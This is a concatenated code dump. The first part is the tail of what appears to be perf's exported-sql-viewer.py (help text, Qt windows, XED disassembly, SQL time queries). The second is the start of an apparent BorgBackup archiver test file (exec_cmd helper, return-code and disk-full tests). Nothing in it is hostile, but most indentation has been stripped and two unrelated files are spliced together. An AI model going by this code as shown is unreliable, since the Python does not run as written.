v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
>- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
>- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
>- __libc_csu_init ls 1 10354 0.1 10 0.0
|- _setjmp libc-2.19.so 1 0 0.0 4 0.0
v- main ls 1 8182043 99.6 180254 99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls</li>
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also the 'Count' column, which would always be 1, is replaced by 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting environment variable PERF_BUILDID_DIR.
One exception is kcore where the DSO long name is used (refer dsos_view on the Tables menu),
or alternatively, set environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Instructions per Cycle (IPC)</h3>
If available, IPC information is displayed in columns 'insn_cnt', 'cyc_cnt' and 'IPC'.
<p><b>Intel PT note:</b> The information applies to the blocks of code ending with, and including, that branch.
Due to the granularity of timing information, the number of cycles for some code blocks will not be known.
In that case, 'insn_cnt', 'cyc_cnt' and 'IPC' are zero, but when 'IPC' is displayed it covers the period
since the previous displayed 'IPC'.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of trace. Examples:
<pre>
81073085947329-81073085958238 From 81073085947329 to 81073085958238
100us-200us From 100us to 200us
10ms- From 10ms to the end
-100ns The first 100ns
-10ms- The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=charts>2. Charts</h1>
<h2 id=timechartbycpu>2.1 Time chart by CPU</h2>
This chart displays context switch information when that data is available. Refer to context_switches_view on the Tables menu.
<h3>Features</h3>
<ol>
<li>Mouse over to highlight the task and show the time</li>
<li>Drag the mouse to select a region and zoom by pushing the Zoom button</li>
<li>Go back and forward by pressing the arrow buttons</li>
<li>If call information is available, right-click to show a call tree opened to that task and time.
Note, the call tree may take some time to appear, and there may not be call information for the task or time selected.
</li>
</ol>
<h3>Important</h3>
The graph can be misleading in the following respects:
<ol>
<li>The graph shows the first task on each CPU as running from the beginning of the time range.
Because tracing might start on different CPUs at different times, that is not necessarily the case.
Refer to context_switches_view on the Tables menu to understand what data the graph is based upon.</li>
<li>Similarly, the last task on each CPU may be shown as running longer than it really was.
Again, refer to context_switches_view on the Tables menu to understand what data the graph is based upon.</li>
<li>When the mouse is over a task, the highlighted task might not be visible on the legend without scrolling if the legend does not fit fully in the window</li>
</ol>
<h1 id=tables>3. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(HelpWindow, self).__init__(parent)
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setWidget(self.text)
AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
def __init__(self, parent=None):
super(HelpOnlyWindow, self).__init__(parent)
self.setMinimumSize(200, 100)
self.resize(800, 600)
self.setWindowTitle("Exported SQL Viewer Help")
self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setCentralWidget(self.text)
# PostgreSQL server version
def PostgreSQLServerVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT VERSION()")
if query.next():
v_str = query.value(0)
v_list = v_str.strip().split(" ")
if v_list[0] == "PostgreSQL" and v_list[2] == "on":
return v_list[1]
return v_str
return "Unknown"
# SQLite version
def SQLiteVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT sqlite_version()")
if query.next():
return query.value(0)
return "Unknown"
# About dialog
class AboutDialog(QDialog):
def __init__(self, glb, parent=None):
super(AboutDialog, self).__init__(parent)
self.setWindowTitle("About Exported SQL Viewer")
self.setMinimumWidth(300)
pyside_version = "1" if pyside_version_1 else "2"
text = "<pre>"
text += "Python version: " + sys.version.split(" ")[0] + "\n"
text += "PySide version: " + pyside_version + "\n"
text += "Qt version: " + qVersion() + "\n"
if glb.dbref.is_sqlite3:
text += "SQLite version: " + SQLiteVersion(glb.db) + "\n"
else:
			text += "PostgreSQL version: " + PostgreSQLServerVersion(glb.db) + "\n"
text += "</pre>"
self.text = QTextBrowser()
self.text.setHtml(text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.text)
self.setLayout(self.vbox)
# Font resize
def ResizeFont(widget, diff):
font = widget.font()
sz = font.pointSize()
font.setPointSize(sz + diff)
widget.setFont(font)
def ShrinkFont(widget):
ResizeFont(widget, -1)
def EnlargeFont(widget):
ResizeFont(widget, 1)
# Unique name for sub-windows
def NumberedWindowName(name, nr):
if nr > 1:
name += " <" + str(nr) + ">"
return name
def UniqueSubWindowName(mdi_area, name):
nr = 1
while True:
unique_name = NumberedWindowName(name, nr)
ok = True
for sub_window in mdi_area.subWindowList():
if sub_window.name == unique_name:
ok = False
break
if ok:
return unique_name
nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
unique_name = UniqueSubWindowName(mdi_area, name)
sub_window.setMinimumSize(200, 100)
sub_window.resize(800, 600)
sub_window.setWindowTitle(unique_name)
sub_window.setAttribute(Qt.WA_DeleteOnClose)
sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
sub_window.name = unique_name
mdi_area.addSubWindow(sub_window)
sub_window.show()
# Main window
class MainWindow(QMainWindow):
def __init__(self, glb, parent=None):
super(MainWindow, self).__init__(parent)
self.glb = glb
self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
self.setMinimumSize(200, 100)
self.mdi_area = QMdiArea()
self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setCentralWidget(self.mdi_area)
menu = self.menuBar()
file_menu = menu.addMenu("&File")
file_menu.addAction(CreateExitAction(glb.app, self))
edit_menu = menu.addMenu("&Edit")
edit_menu.addAction(CreateAction("&Copy", "Copy to clipboard", self.CopyToClipboard, self, QKeySequence.Copy))
edit_menu.addAction(CreateAction("Copy as CS&V", "Copy to clipboard as CSV", self.CopyToClipboardCSV, self))
edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))
reports_menu = menu.addMenu("&Reports")
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))
self.EventMenu(GetEventList(glb.db), reports_menu)
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))
if IsSelectable(glb.db, "context_switches"):
charts_menu = menu.addMenu("&Charts")
charts_menu.addAction(CreateAction("&Time chart by CPU", "Create a new window displaying time charts by CPU", self.TimeChartByCPU, self))
self.TableMenu(GetTableList(glb), menu)
self.window_menu = WindowMenu(self.mdi_area, menu)
help_menu = menu.addMenu("&Help")
help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
help_menu.addAction(CreateAction("&About Exported SQL Viewer", "About this application", self.About, self))
def Try(self, fn):
win = self.mdi_area.activeSubWindow()
if win:
try:
fn(win.view)
except:
pass
def CopyToClipboard(self):
self.Try(CopyCellsToClipboardHdr)
def CopyToClipboardCSV(self):
self.Try(CopyCellsToClipboardCSV)
def Find(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.find_bar.Activate()
except:
pass
def FetchMoreRecords(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.fetch_bar.Activate()
except:
pass
def ShrinkFont(self):
self.Try(ShrinkFont)
def EnlargeFont(self):
self.Try(EnlargeFont)
def EventMenu(self, events, reports_menu):
branches_events = 0
for event in events:
event = event.split(":")[0]
if event == "branches":
branches_events += 1
dbid = 0
for event in events:
dbid += 1
event = event.split(":")[0]
if event == "branches":
				label = "All branches" if branches_events == 1 else "All branches " + "(id=" + str(dbid) + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewBranchView(x), self))
				label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + str(dbid) + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewSelectedBranchView(x), self))
def TimeChartByCPU(self):
TimeChartByCPUWindow(self.glb, self)
def TableMenu(self, tables, menu):
table_menu = menu.addMenu("&Tables")
for table in tables:
table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda a=None,t=table: self.NewTableView(t), self))
def NewCallGraph(self):
CallGraphWindow(self.glb, self)
def NewCallTree(self):
CallTreeWindow(self.glb, self)
def NewTopCalls(self):
dialog = TopCallsDialog(self.glb, self)
ret = dialog.exec_()
if ret:
TopCallsWindow(self.glb, dialog.report_vars, self)
def NewBranchView(self, event_id):
BranchWindow(self.glb, event_id, ReportVars(), self)
def NewSelectedBranchView(self, event_id):
dialog = SelectedBranchDialog(self.glb, self)
ret = dialog.exec_()
if ret:
BranchWindow(self.glb, event_id, dialog.report_vars, self)
def NewTableView(self, table_name):
TableWindow(self.glb, table_name, self)
def Help(self):
HelpWindow(self.glb, self)
def About(self):
dialog = AboutDialog(self.glb, self)
dialog.exec_()
# XED Disassembler
class xed_state_t(Structure):
_fields_ = [
("mode", c_int),
("width", c_int)
]
class XEDInstruction():
def __init__(self, libxed):
# Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
xedd_t = c_byte * 512
self.xedd = xedd_t()
self.xedp = addressof(self.xedd)
libxed.xed_decoded_inst_zero(self.xedp)
self.state = xed_state_t()
self.statep = addressof(self.state)
# Buffer for disassembled instruction text
self.buffer = create_string_buffer(256)
self.bufferp = addressof(self.buffer)
class LibXED():
def __init__(self):
try:
self.libxed = CDLL("libxed.so")
except:
self.libxed = None
if not self.libxed:
self.libxed = CDLL("/usr/local/lib/libxed.so")
self.xed_tables_init = self.libxed.xed_tables_init
self.xed_tables_init.restype = None
self.xed_tables_init.argtypes = []
self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
self.xed_decoded_inst_zero.restype = None
self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
self.xed_operand_values_set_mode.restype = None
self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
self.xed_decoded_inst_zero_keep_mode.restype = None
self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
self.xed_decode = self.libxed.xed_decode
self.xed_decode.restype = c_int
self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
self.xed_format_context = self.libxed.xed_format_context
self.xed_format_context.restype = c_uint
self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
self.xed_tables_init()
def Instruction(self):
return XEDInstruction(self)
def SetMode(self, inst, mode):
if mode:
inst.state.mode = 4 # 32-bit
inst.state.width = 4 # 4 bytes
else:
inst.state.mode = 1 # 64-bit
inst.state.width = 8 # 8 bytes
self.xed_operand_values_set_mode(inst.xedp, inst.statep)
def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
self.xed_decoded_inst_zero_keep_mode(inst.xedp)
err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
if err:
return 0, ""
# Use AT&T mode (2), alternative is Intel (3)
ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
if not ok:
return 0, ""
if sys.version_info[0] == 2:
result = inst.buffer.value
else:
result = inst.buffer.value.decode()
# Return instruction length and the disassembled instruction text
# For now, assume the length is in byte 166
return inst.xedd[166], result
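# Try to open a file for binary reading, returning None on failure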
def TryOpen(file_name):
try:
return open(file_name, "rb")
except:
return None
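# Determine from the ELF header whether a file is 64-bit, defaulting to this
# machine's pointer size for non-ELF files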
def Is64Bit(f):
result = sizeof(c_void_p)
# ELF support only
pos = f.tell()
f.seek(0)
header = f.read(7)
f.seek(pos)
	magic = header[0:4]
	if sys.version_info[0] == 2:
		# Python 2: f.read() returns str, so compare the magic against a str
		elf_magic = chr(127) + "ELF"
		eclass = ord(header[4])
		encoding = ord(header[5])
		version = ord(header[6])
	else:
		# Python 3: f.read() returns bytes, so compare the magic against bytes
		elf_magic = b"\x7fELF"
		eclass = header[4]
		encoding = header[5]
		version = header[6]
	if magic == elf_magic and eclass > 0 and eclass < 3 and encoding > 0 and encoding < 3 and version == 1:
		result = True if eclass == 2 else False
return result
# Global data
class Glb():
def __init__(self, dbref, db, dbname):
self.dbref = dbref
self.db = db
self.dbname = dbname
self.home_dir = os.path.expanduser("~")
self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
if self.buildid_dir:
self.buildid_dir += "/.build-id/"
else:
self.buildid_dir = self.home_dir + "/.debug/.build-id/"
self.app = None
self.mainwindow = None
self.instances_to_shutdown_on_exit = weakref.WeakSet()
try:
self.disassembler = LibXED()
self.have_disassembler = True
except:
self.have_disassembler = False
self.host_machine_id = 0
self.host_start_time = 0
self.host_finish_time = 0
def FileFromBuildId(self, build_id):
file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
return TryOpen(file_name)
def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
# Assume current machine i.e. no support for virtualization
if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
file_name = os.getenv("PERF_KCORE")
f = TryOpen(file_name) if file_name else None
if f:
return f
# For now, no special handling if long_name is /proc/kcore
f = TryOpen(long_name)
if f:
return f
f = self.FileFromBuildId(build_id)
if f:
return f
return None
def AddInstanceToShutdownOnExit(self, instance):
self.instances_to_shutdown_on_exit.add(instance)
# Shutdown any background processes or threads
def ShutdownInstances(self):
for x in self.instances_to_shutdown_on_exit:
try:
x.Shutdown()
except:
pass
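	# The host machine is the entry in the machines table with pid = -1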
def GetHostMachineId(self):
query = QSqlQuery(self.db)
QueryExec(query, "SELECT id FROM machines WHERE pid = -1")
if query.next():
self.host_machine_id = query.value(0)
else:
self.host_machine_id = 0
return self.host_machine_id
def HostMachineId(self):
if self.host_machine_id:
return self.host_machine_id
return self.GetHostMachineId()
def SelectValue(self, sql):
query = QSqlQuery(self.db)
try:
QueryExec(query, sql)
except:
return None
if query.next():
return Decimal(query.value(0))
return None
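	# Minimum and maximum times seen in context switches, samples and calls,
	# used below to derive the trace start and finish times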
def SwitchesMinTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM context_switches"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id LIMIT 1")
def SwitchesMaxTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM context_switches"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id DESC LIMIT 1")
def SamplesMinTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM samples"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id LIMIT 1")
def SamplesMaxTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM samples"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id DESC LIMIT 1")
def CallsMinTime(self, machine_id):
		return self.SelectValue("SELECT calls.call_time"
					" FROM calls"
					" INNER JOIN threads ON threads.id = calls.thread_id"
					" WHERE calls.call_time != 0 AND threads.machine_id = " + str(machine_id) +
					" ORDER BY calls.id LIMIT 1")
def CallsMaxTime(self, machine_id):
		return self.SelectValue("SELECT calls.return_time"
					" FROM calls"
					" INNER JOIN threads ON threads.id = calls.thread_id"
					" WHERE calls.return_time != 0 AND threads.machine_id = " + str(machine_id) +
					" ORDER BY calls.return_time DESC LIMIT 1")
def GetStartTime(self, machine_id):
t0 = self.SwitchesMinTime(machine_id)
t1 = self.SamplesMinTime(machine_id)
t2 = self.CallsMinTime(machine_id)
if t0 is None or (not(t1 is None) and t1 < t0):
t0 = t1
if t0 is None or (not(t2 is None) and t2 < t0):
t0 = t2
return t0
def GetFinishTime(self, machine_id):
t0 = self.SwitchesMaxTime(machine_id)
t1 = self.SamplesMaxTime(machine_id)
t2 = self.CallsMaxTime(machine_id)
if t0 is None or (not(t1 is None) and t1 > t0):
t0 = t1
if t0 is None or (not(t2 is None) and t2 > t0):
t0 = t2
return t0
def HostStartTime(self):
if self.host_start_time:
return self.host_start_time
self.host_start_time = self.GetStartTime(self.HostMachineId())
return self.host_start_time
def HostFinishTime(self):
if self.host_finish_time:
return self.host_finish_time
self.host_finish_time = self.GetFinishTime(self.HostMachineId())
return self.host_finish_time
def StartTime(self, machine_id):
if machine_id == self.HostMachineId():
return self.HostStartTime()
return self.GetStartTime(machine_id)
def FinishTime(self, machine_id):
if machine_id == self.HostMachineId():
return self.HostFinishTime()
return self.GetFinishTime(machine_id)
# Database reference
class DBRef():
def __init__(self, is_sqlite3, dbname):
self.is_sqlite3 = is_sqlite3
self.dbname = dbname
self.TRUE = "TRUE"
self.FALSE = "FALSE"
# SQLite prior to version 3.23 does not support TRUE and FALSE
if self.is_sqlite3:
self.TRUE = "1"
self.FALSE = "0"
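	# Open the database; for PostgreSQL the database name may contain space-separated
	# connection options (hostname=, port=, username=, password=, dbname=)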
def Open(self, connection_name):
dbname = self.dbname
if self.is_sqlite3:
db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
else:
db = QSqlDatabase.addDatabase("QPSQL", connection_name)
opts = dbname.split()
for opt in opts:
if "=" in opt:
opt = opt.split("=")
if opt[0] == "hostname":
db.setHostName(opt[1])
elif opt[0] == "port":
db.setPort(int(opt[1]))
elif opt[0] == "username":
db.setUserName(opt[1])
elif opt[0] == "password":
db.setPassword(opt[1])
elif opt[0] == "dbname":
dbname = opt[1]
else:
dbname = opt
db.setDatabaseName(dbname)
if not db.open():
raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
return db, dbname
# Main
def Main():
usage_str = "exported-sql-viewer.py [--pyside-version-1] <database name>\n" \
" or: exported-sql-viewer.py --help-only"
ap = argparse.ArgumentParser(usage = usage_str, add_help = False)
ap.add_argument("--pyside-version-1", action='store_true')
ap.add_argument("dbname", nargs="?")
ap.add_argument("--help-only", action='store_true')
args = ap.parse_args()
if args.help_only:
app = QApplication(sys.argv)
mainwindow = HelpOnlyWindow()
mainwindow.show()
err = app.exec_()
sys.exit(err)
dbname = args.dbname
if dbname is None:
ap.print_usage()
print("Too few arguments")
sys.exit(1)
is_sqlite3 = False
try:
f = open(dbname, "rb")
if f.read(15) == b'SQLite format 3':
is_sqlite3 = True
f.close()
except:
pass
dbref = DBRef(is_sqlite3, dbname)
db, dbname = dbref.Open("main")
glb = Glb(dbref, db, dbname)
app = QApplication(sys.argv)
glb.app = app
mainwindow = MainWindow(glb)
glb.mainwindow = mainwindow
mainwindow.show()
err = app.exec_()
glb.ShutdownInstances()
db.close()
sys.exit(err)
if __name__ == "__main__":
Main()
archiver.py
import argparse
import dateutil.tz
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timezone
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota, PURE_PYTHON_MSGPACK_WARNING
from ..cache import Cache, LocalCache
from ..chunker import has_seek_hole
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..locking import LockFailed
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
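# Run a borg command and return (exit code, output): either forked as a subprocess
# (optionally via an external binary) or in-process through Archiver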
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
if fork:
try:
if exe is None:
borg = (sys.executable, '-m', 'borg.archiver')
elif isinstance(exe, str):
borg = (exe, )
elif not isinstance(exe, tuple):
raise ValueError('exe must be None, a tuple or a str')
output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
ret = 0
except subprocess.CalledProcessError as e:
output = e.output
ret = e.returncode
except SystemExit as e: # possibly raised by argparse
output = ''
ret = e.code
if binary_output:
return ret, output
else:
return ret, os.fsdecode(output)
else:
stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
try:
sys.stdin = StringIO(input.decode())
sys.stdin.buffer = BytesIO(input)
output = BytesIO()
            # Always use utf-8 here, to simplify .decode() below
output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
if archiver is None:
archiver = Archiver()
archiver.prerun_checks = lambda *args: None
archiver.exit_code = EXIT_SUCCESS
helpers.exit_code = EXIT_SUCCESS
try:
args = archiver.parse_args(list(args))
# argparse parsing may raise SystemExit when the command line is bad or
                # actions that abort early (eg. --help) were given. Catch this and return
                # the error code as if we invoked a Borg binary.
except SystemExit as e:
output_text.flush()
return e.code, output.getvalue() if binary_output else output.getvalue().decode()
ret = archiver.run(args)
output_text.flush()
return ret, output.getvalue() if binary_output else output.getvalue().decode()
finally:
sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
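# Check whether the 'tar' found on PATH is GNU tar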
def have_gnutar():
if not shutil.which('tar'):
return False
popen = subprocess.Popen(['tar', '--version'], stdout=subprocess.PIPE)
stdout, stderr = popen.communicate()
return b'GNU tar' in stdout
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
try:
exec_cmd('help', exe='borg.exe', fork=True)
BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
BORG_EXES = ['python', ]
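# Fixture returning a runner that always forks, parametrized over the Python entry
# point and, if available, the standalone borg.exe binary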
@pytest.fixture(params=BORG_EXES)
def cmd(request):
if request.param == 'python':
exe = None
elif request.param == 'binary':
exe = 'borg.exe'
else:
raise ValueError("param must be 'python' or 'binary'")
def exec_fn(*args, **kw):
return exec_cmd(*args, exe=exe, fork=True, **kw)
return exec_fn
def test_return_codes(cmd, tmpdir):
repo = tmpdir.mkdir('repo')
input = tmpdir.mkdir('input')
output = tmpdir.mkdir('output')
input.join('test_file').write('content')
rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
assert rc == EXIT_SUCCESS
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_SUCCESS
with changedir(str(output)):
rc, out = cmd('extract', '%s::archive' % repo)
assert rc == EXIT_SUCCESS
rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
assert rc == EXIT_WARNING # pattern did not match
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_ERROR # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
DF_MOUNT = '/tmp/borg-mount'
@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
def make_files(dir, count, size, rnd=True):
shutil.rmtree(dir, ignore_errors=True)
os.mkdir(dir)
if rnd:
count = random.randint(1, count)
if size > 1:
size = random.randint(1, size)
for i in range(count):
fn = os.path.join(dir, "file%03d" % i)
with open(fn, 'wb') as f:
data = os.urandom(size)
f.write(data)
with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
mount = DF_MOUNT
assert os.path.exists(mount)
repo = os.path.join(mount, 'repo')
input = os.path.join(mount, 'input')
reserve = os.path.join(mount, 'reserve')
for j in range(100):
shutil.rmtree(repo, ignore_errors=True)
shutil.rmtree(input, ignore_errors=True)
# keep some space and some inodes in reserve that we can free up later:
make_files(reserve, 80, 100000, rnd=False)
rc, out = cmd('init', repo)
if rc != EXIT_SUCCESS:
print('init', rc, out)
assert rc == EXIT_SUCCESS
try:
success, i = True, 0
while success:
i += 1
try:
make_files(input, 20, 200000)
except OSError as err:
if err.errno == errno.ENOSPC:
# already out of space
break
raise
try:
rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
success = rc == EXIT_SUCCESS
if not success:
print('create', rc, out)
finally:
# make sure repo is not locked
shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
os.remove(os.path.join(repo, 'lock.roster'))
finally:
# now some error happened, likely we are out of disk space.
# free some space so we can expect borg to be able to work normally:
shutil.rmtree(reserve, ignore_errors=True)
rc, out = cmd('list', repo)
if rc != EXIT_SUCCESS:
print('list', rc, out)
rc, out = cmd('check', '--repair', repo)
if rc != EXIT_SUCCESS:
print('check', rc, out)
assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
EXE = None # python source based
FORK_DEFAULT = False
prefix = ''
def setUp(self):
os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
self.archiver = not self.FORK_DEFAULT and Archiver() or None
self.tmpdir = tempfile.mkdtemp()
